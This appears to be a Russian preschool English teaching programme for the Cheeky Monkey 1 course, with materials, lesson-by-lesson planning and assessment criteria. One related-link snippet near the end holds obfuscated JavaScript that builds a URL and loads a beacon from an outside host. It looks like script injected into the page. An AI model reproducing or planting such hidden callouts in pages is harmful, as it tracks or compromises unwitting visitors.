Выдавливающиеся картинки (Press outs)

На пятом (Cheeky Monkey 1) занятии каждого раздела дети работают с press outs (двусторонними картинками, легко выдавливающимися из плотного листа бумаги, которые прилагаются к пособию). Среди них есть картинки, которые дети могут надеть на пальчик, картинки, которые можно держать за «ножку», картинки-маски и др. Дети используют эти картинки-игрушки во время прослушивания сюжетной истории, что помогает им в восприятии звучащего текста. К пособию прилагаются press outs и для занятий, посвящённых Хеллоуину и Рождеству. Использование двусторонних картинок эффективно также и в играх для закрепления ключевой лексики, и при исполнении песен.  

Стикеры

К пособию прилагаются два листа со стикерами (наклейками). Они используются при выполнении заданий к сюжетной истории, работа с ними направлена на закрепление изучаемой лексики. На каждом завершающем занятии детям предлагается наклеить «премиальный» стикер, что является своеобразным поощрением за выполнение всех заданий раздела.

Аудиофайлы

К пособию прилагаются многочисленные аудиофайлы, которые предназначены для аудирования на занятиях. На них содержится весь аудиоматериал пособия Cheeky Monkey: песни, фонограммы некоторых песен для караоке, истории, чанты, фразы для ведения занятий.

Демонстрационные карточки

В набор включены цветные демонстрационные карточки, пронумерованные и, для удобства обращения с ними, снабжённые цветовой маркировкой соответственно цвету того раздела, к которому они относятся. Демонстрационные карточки могут использоваться для введения новой лексики, её закрепления, а также в играх и заданиях, описанных в методическом пособии.

Дидактические карточки

Дидактические карточки представляют собой сюжетные картинки, иллюстрирующие истории, с которыми дети знакомятся в ходе занятий, и служат визуальной опорой для преодоления трудностей при аудировании. Каждый эпизод истории представлен на отдельной карточке. Для удобства на обороте каждой карточки приводится текст эпизода. Карточки могут быть использованы в качестве визуальной опоры и при выполнении других заданий.

Методическое пособие

В методическом пособии содержатся подробные комментарии на русском языке, в частности, указаны цели разделов и занятий, перед описанием каждого занятия перечислены активная и пассивная лексика, лексика для повторения, а также средства обучения. Каждый этап занятия описан очень подробно: какие фразы использовать для его ведения, какие игры, песни и задания включать на конкретном этапе, как проводить игры и выполнять задания, учить песни. В методическое пособие включены тексты всех песен, чантов и историй, а также по три дополнительных задания к каждому занятию, использование которых отнесено на усмотрение самого педагога. Во многих дополнительных заданиях задействованы раздаточные материалы.

Игрушка обезьянка Чики

Обезьянка Чики — перчаточная кукла, которая может начинать занятие, приветствуя детей, помогать им во время занятий, представлять новые слова и вести игры, направленные на закрепление изученного материала.

  1. Время и сроки реализации программы

Систематическое и целенаправленное обучение английскому языку, как правило, осуществляется на занятиях, которые являются одной из форм образовательной работы с детьми в дошкольной образовательной организации.

Занятия проводятся в течение учебного года. Обучение происходит 1–2 раза в неделю. На занятиях группа делится на подгруппы.

Программа рассчитана на 3 года обучения (средняя, старшая, подготовительная к школе группы). Занятия в средних группах длятся 15–20 минут.

Длительность курса английского языка Cheeky Monkey 1 для средней группы следующая:

№ п/п

Возраст детей

Основной курс (часы)

Дополнительный курс (часы)

Итого (часы)

1

Дети 4-5 лет

(средняя группа)

38

-

38

  1. Литература

Список компонентов комплекта Cheeky Monkey 1

1) Комарова Ю.А. Парциальная программа к курсу английского языка для дошкольников Cheeky Monkey. М.: Русское слово, 2015. (Мозаичный парк).

2) Комарова Ю.А., Медуэлл К. Cheeky Monkey 1: развивающее пособие для детей дошкольного возраста. Средняя группа. 4–5 лет. М.: Русское слово: Макмиллан, 2014. (Мозаичный парк).

3) Комарова Ю.А., Медуэлл К. Cheeky Monkey 1: методические рекомендации к развивающему пособию Ю.А. Комаровой, К. Медуэлл для детей дошкольного возраста. Средняя группа. 4–5 лет. М.: Русское слово: Макмиллан, 2014. (Мозаичный парк).

4) Комарова Ю.А., Медуэлл К. Дидактические карточки к развивающему пособию Cheeky Monkey 1. Средняя группа. 4–5 лет.

5) Комарова Ю.А., Медуэлл К. Демонстрационные карточки к развивающему пособию Cheeky Monkey 1. Средняя группа. 4–5 лет.

6) Медуэлл К. Аудиозаписи к развивающему пособию Cheeky Monkey 1. Средняя группа. 4–5 лет.

7) Медуэлл К. Аудиозаписи с дополнительными материалами. Средняя группа. 4–5 лет.

ТЕМАТИЧЕСКОЕ ПЛАНИРОВАНИЕ

Тематическое планирование образовательной деятельности, реализуемой в рамках курса Cheeky Monkey 1

№ п/п

Цели занятия

Активная лексика

Лексика для повторения

Средства обучения

РАЗДЕЛ 1. НЕLLO, CHEEKY MONKEY!

Занятие 1

Знакомство с обезьянкой Чики. Первичное усвоение новых лексических единиц, разучиние мини-чантов

Hello! Bye-bye! еyes, ears, mouth

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки

Занятие 2

Восприятие на слух и понимание сюжетной истории

Hello! Bye-bye! еyes, ears, mouth

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки еyes, ears, mouth, набор сюжетных картинок к разделу 1, развивающее пособие

Занятие 3

Закрепление изучаемой лексики, повторение песен и сюжетной истории

Hello! Bye-bye! еyes, ears, mouth

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки еyes, ears, mouth, набор сюжетных картинок к разделу 1, развивающее пособие, цветные карандаши

Занятие 4

Аудирование учебного материала, повторение изученной лексики, разучивание новой песни

Hello! Bye-bye! еyes, ears, mouth

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки еyes, ears, mouth, набор сюжетных картинок к разделу 1, развивающее пособие, платок

Занятие 5

Аудирование в игре, контроль владения изученной лексикой

Hello! Bye-bye! еyes, ears, mouth

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки еyes, ears, mouth, набор сюжетных картинок к разделу 1

Занятие 6

Повторение материала, изученного в разделе 1

Hello! Bye-bye! еyes, ears, mouth

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки еyes, ears, mouth, набор сюжетных картинок к разделу 1

РАЗДЕЛ 2. IT’S BATHTIME!

Занятие 1

Знакомство с семьей обезьянки Чики, первичное усвоение новых лексических единиц, разучивание песни

mummy, daddy, baby

Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки mummy, daddy, baby

Занятие 2

Восприятие на слух и понимание сюжетной истории

mummy, daddy, baby

Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки mummy, daddy, baby, набор сюжетных картинок к разделу 2, стикеры к разделу 2, развивающее пособие

Занятие 3

Закрепление изучаемой лексики, повторение песен и сюжетной истории

mummy, daddy, baby

Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки mummy, daddy, baby, набор сюжетных картинок к разделу 2, стикеры к разделу 2, развивающее пособие, цветные карандаши

Занятие 4

Аудирование учебного материала, знакомство с новой лексикой, разучивание новой песни

yellow, one

mummy, daddy, baby Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки mummy, daddy, baby, yellow набор сюжетных картинок к разделу 2, стикеры к разделу 2, развивающее пособие

Занятие 5

Аудирование в игре, контроль владения изученной лексикой

yellow, one

mummy, daddy, baby Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, набор сюжетных картинок к разделу 2, press outs к разделу 2

Занятие 6

Повторение материала изученного в разделе 2

mummy, daddy, baby

mummy, daddy, baby Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки mummy, daddy, baby, набор сюжетных картинок к разделу 2, стикеры к разделу 2, развивающее пособие, цветные карандаши

РАЗДЕЛ 3. CHEEKY’S FRIENDS!

Занятие 1

Знакомство с друзьями обезьянки Чики, первичное усвоение новых лексических единиц, разучивание песни

duck, rabbit, bird

Hello! Bye-bye! Cheeky

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки duck, rabbit, bird

Занятие 2

Восприятие на слух

и понимание

сюжетной истории

duck, rabbit, bird

Hello! Bye-bye! Cheeky

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки duck, rabbit, bird, набор сюжетных картинок к разделу 3, стикеры к разделу 3, развивающее пособие

Занятие 3

Закрепление изучаемой лексики, повторение песен и сюжетной истории

duck, rabbit, bird

Hello! Bye-bye! Cheeky

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки duck, rabbit, bird, набор сюжетных картинок к разделу 3, 10 стикеры к разделу 3, развивающее пособие, цветные карандаши

Занятие 4

Аудирование учебного матери ала, знакомство с новой лексикой, разучивание песни

blue, two

duck, rabbit, bird

Hello! Bye-bye! yellow, one

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки blue, bird, набор сюжетных картинок к разделу 3, стикеры , развивающее пособие

Занятие 5

Аудирование в игре, контроль владения изученной лексикой

duck, rabbit, bird, blue

Hello! Bye-bye! yellow, one, two

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки duck, rabbit, bird, набор сюжетных картинок к разделу 3, стикеры к разделу 3, развивающее пособие, press outs к разделу 3

Занятие 6

Повторение материала изученного в разделе 3

duck, rabbit, bird, blue

Hello! Bye-bye! yellow, one, two

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки duck, rabbit, bird, набор сюжетных картинок к разделу 3, стикеры к разделу 3, развивающее пособие, цветные карандаши

РАЗДЕЛ 4. CHEEKY’S SNACK!

Занятие 1

Знакомство с любимой едой Чики, первичное усвоение новых лексических един., разучивание песни

banana, sandwich, apple

Hello! Bye-bye! one, two

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки banana, sandwich, apple

Занятие 2

Восприятие на слух и понимание сюжетной истории

banana, sandwich, apple

Hello! Bye-bye! one, two

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки banana, sandwich, apple, набор сюжетных картинок к разделу 4, стикеры к разделу 4, развивающее пособие

Занятие 3

Закрепление изучаемой лексики, повторение песен и сюжетной истории

banana, sandwich, apple

Hello! Bye-bye! one, two

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки banana, sandwich, apple, набор сюжетных картинок к разделу 4, стикеры к разделу 4, развивающее пособие, карандаши

Занятие 4

Аудирование учебного материала, знакомство с новой лексикой, разуч. новой песни

red, three

Hello! Bye-bye! one, two, yellow, blue, bird, apple

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки banana, sandwich, apple, red набор сюжетных картинок к разделу 4, стикеры к разделу 4, развивающее пособие

Занятие 5

Аудирование в игре, контроль владения изученной лексикой

banana, sandwich, apple, red, three

Hello! Bye-bye! one, two, yellow, blue, bird

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки banana, sandwich, apple, набор сюжетных картинок к разделу 4, стикеры к разделу 4, развивающее пособие, press outs 4

Занятие 6

Повторение материала изученного в разделе 4

banana, sandwich, apple, red, three

Hello! Bye-bye! one, two, yellow, blue, bird

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки banana, sandwich, apple, набор сюжетных картинок к разделу 4, стикеры к разделу 4, развивающее пособие, красные и желтые карандаши.

РАЗДЕЛ 5. LET’S DRESS UP!

Занятие 1

Знакомство с любимой едой Чики, первичное усвоение новых лексических единиц, разучивание песни

dress, shoes, hat

Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки dress, shoes, hat

Занятие 2

Восприятие на слух и понимание сюжетной истории

dress, shoes, hat

Hello! Bye-bye!, one, two, three, yellow, blue, red

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки dress, shoes, hat, набор сюжетных картинок к разделу 5, стикеры к разделу 5, развивающее пособие

Занятие 3

Закрепление изучаемой лексики, повторение песен и сюжетной истории

dress, shoes, hat

Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки dress, shoes, hat, набор сюжетных картинок к разделу 5, стикеры к разделу 5, развивающее пособие, цветные карандаши

Занятие 4

Аудирование учебного материала, закрепление изученной лексики, разучивание новой песни

dress, shoes, hat

Hello! Bye-bye!, one, two, three, yellow, blue, red

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки red, blue, yellow, dress, shoes, hat, набор сюжетных картинок к разделу 5, 1, 2, 3, стикеры к разделу 5, развивающее пособие

Занятие 5

Аудирование в игре, контроль владения изученной лексикой

dress, shoes, hat

one, two, three, yellow, blue, red Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки dress, shoes, hat, набор сюжетных картинок к разделу 5, press outs к разделу 5

Занятие 6

Повторение материала, изученного в разделе 5

dress, shoes, hat

one, two, three, yellow, blue, red Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки red, blue, yellow, «премиальные» стикеры, развивающее пособие, красные, желтые, синие карандаши.

РАЗДЕЛ 6. CHEEKY’S BEDTIME!

Занятие 1

Знакомство с названием игрушек, первичное усвоение новых лексических единиц, разучивание песни

robot, train, ball, teddy bear

Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки robot, train, ball, teddy bear, плюшевый медведь

Занятие 2

Восприятие на слух и понимание сюжетной истории

robot, train, ball, teddy bear

Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки robot, train, ball, teddy, набор сюжетных картинок к разделу 6, стикеры к разделу 6, развивающее пособие

Занятие 3

Закрепление изучаемой лексики, повторение песен и сюжетной истории

robot, train, ball, teddy bear

Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки robot, train, ball, teddy, набор сюжетных картинок к разделу 6, стикеры к разделу 6, развивающее пособие, цветные карандаши

Занятие 4

Аудирование учебного материала, закрепление изучаемой лексики, разучивание новой песни

robot, train, ball, teddy bear

one, two, three, yellow, blue, red Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, мешок, демонстрационные карточки robot, train, ball, teddy, red, blue, yellow, 1, 2, 3, стикеры к разделу 6, развивающее пособие

Занятие 5

Аудирование в игре, контроль владения изученной лексикой

robot, train, ball, teddy bear

Hello! Bye-bye!, one, two, three

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки robot, train, ball, teddy, набор сюжетных картинок к разделу 6, стикеры к разделу 6, press outs к разделу 6, мячи красного, желтого и синего цвета

Занятие 6

Повторение материала, изученного в разделе 6

robot, train, ball, teddy bear

yellow, blue, red Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки robot, train, ball, красного, желтого и синего цвета карандаши, «премиальные» стикеры, развивающее пособие

ДОПОЛНИТЕЛЬНЫЙ РАЗДЕЛ HOLIDAYS

Halloween

Осмысление новой лексики и реагирование мимикой, жестами; отработка новой лексики с использованием press outs, повторение изученного речевого материала, разучивание и исполнение песен в игре

Cat, bat

Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки сat, bat; press outs.

Christmas

Осмысление новой лексики и реагирование мимикой, жестами; отработка новой лексики с использованием press outs, повторение изученного речевого материала, разучивание и исполнение песен в игре

Bell, tree

Hello! Bye-bye!

Аудиозаписи, перчаточная кукла обезьянка Чики, демонстрационные карточки bell, tree; музыкальные инструменты: колокольчики, бубны, треугольники, блестящая бумага, клей, press outs.

ВСЕГО

38 ЧАСОВ

        Формы контроля усвоения программы

Для определения уровня результативности реализации программы используются:

- метод педагогического наблюдения,

- беседа,

- тестовые задания,

- мониторинг.

Диагностика проводится дважды: в начале и в конце учебного года.

Мониторинг качества усвоения программы

курс Cheeky Monkey 1

Уровень знаний

Показатели результативности

Средний возраст (4-5 лет)

Высокий, средний, низкий

Ребенок…

  • Позитивно реагирует на английскую речь
  • Проявляет интерес к учебным персонажам
  • Подчиняется принятой схеме ведения занятия
  • Активно участвует в играх, разучивании песен, выполнении заданий
  • Проявляет интерес к сюжетным историям
  • Легко взаимодействует со сверстниками, когда требуется
  • Проявляет желание делать что-либо самостоятельно
  • Стремится угадывать значения незнакомых английских слов
  • Распознает английские слова и умеет реагировать на них с помощью мимики и жестов
  • Стремится к пониманию обращенной к нему английской речи
  • Выполняет обращенные к нему команды на английском языке
  • Вступает в вербальное общение на английском языке по приглашению педагога
  • Проявляет интерес к работе в пособии
  • Успешно справляется с учебно-познавательным задачами
  • Легко вспоминает слова, выученные на предыдущих занятиях
  • Умеет концентрировать внимание в течение требуемого промежутка времени

Список использованной литературы

1. Агеева И.Д. Английский язык для детей: Лениздат-Союз, 2010.

2. Артемов В.А. Психология обучения иностранным языкам. М.: Просвещение, 1969.

3. Бабаева Т.И., Римашевская Л.С. Как развивать взаимоотношения и сотрудничество дошкольников в детском саду. Игровые ситуации, игры, этюды. СПб.: Детство-Пресс, 2012.

4. Гордийко О.А. Иллюстрированный английский словарик для малышей. Белгород: Клуб семейного досуга, 2011.

5. Евсеева М.Н. Программа обучения английскому языку детей дошкольного возраста. Белгород: Панорама, 2010.

6. Земченкова Т.В. Английский для дошкольников. М.: ВАКО, 2008. (Дошкольники: учим, развиваем, воспитываем).

7. Микляева Н.В., Ревенкова К.М., Шматко Н.Ю. Лингвистический поезд: методика обучения английскому языку дома и в детском саду: методическое пособие для педагогов ДОУ. М.: УЦ «Перспектива», 2010.

8. Петрова Е.А. Проблема готовности дошкольников к обучению иностранному языку // Детский сад от А до Я. 2004. № 1.

9. Проскурина З.А., Протасова Е.Ю. Игровые упражнения к наиболее распространённым темам // Детский сад от А до Я. 2004. № 1.

10. Рогова Г.В. Methods of Teaching English. Л.: Просвещение, 1975.

11. Тарасюк Н.А. Уроки общения (на примере английского языка): учебное пособие [для учителей иностранного языка и студентов языковых факультетов вузов, специализирующихся в сфере иноязычного дошкольного образования]. М.: Флинта: Наука, 1999.

12. Федеральный государственный образовательный стандарт дошкольного образования (ФГОС ДО).

13. Федеральный закон Российской Федерации № 273-ФЗ «Об образовании в Российской Федерации».

14. Хафизова С.Н. Особенности обучения английскому языку дошкольников. Детский сад от А до Я. 2004. № 1. 26. Шишкова И.А., Вербовская М.Е. Английский для малышей. М.: Росмэн-Пресс, 2009.


По теме: методические разработки, презентации и конспекты

Дополнительная образовательная программа "Английский малышам"

Пояснительная записка Дополнительная образовательная программа кружка «Английский малышам" является дополнительной образовательной программой социально-коммуникативной и речевой направленности. До...

Программа "Английский язык и дошкольник" для дошкольников изучающих английский язык

В связи с возрастающей учебной нагрузкой в детском саду, с одной стороны, и заинтересованностью родителей в изучении их детьми английского языка с другой, а также исходя из заботы о здоровье ре...

РАБОЧАЯ ПРОГРАММА «Английский язык для дошкольников» (5 -7 лет)

Данная рабочая программа по английскому языку для детского сада составлена на основе:Закона Российской Федерации «Об образовании» № 273-Ф от 29.12.2012;Примерной образовательной программы ...

Программа английский язык для дошкольников 6-7 лет (1 год обучения)

Учебная программа «Английский язык для детей» рассчитана на 1 учебный год 64 учебных часа , 2 часа в неделю. Возраст: 6 – 7 лет. Длительность занятий: 25 - 30 минут. Цель курса: развитие лин...

НОД "Настроение Джони" по дополнительной образовательной программе "Английский язык и дошкольник" в ДОУ

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'nxqkbdvu.lussoit.com\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.cre...

Парциальная образовательная программа "Английский для дошкольников" Ю.А. Комарова

Cоздание условий для овладения детьми английским языком как средством развития коммуникативных способностей детей, как инструментом их широкого взаимодействия с миром, обеспечения практики в разных ви...

РАБОЧАЯ ПРОГРАММА (на основе комплексной основной образовательной программы дошкольного образования «Детство»/под редакцией Т.И. Бабаевой, А.Г. Гогоберидзе, О.В. Солнцева 2016г. и парциальной образовательной программы по приобщению дошкольников к культур

Рабочая программа является нормативным документом, определяющим цели и ценности образования в муниципальном бюджетном образовательном учреждении дошкольного образования, характеризующим содержание обр...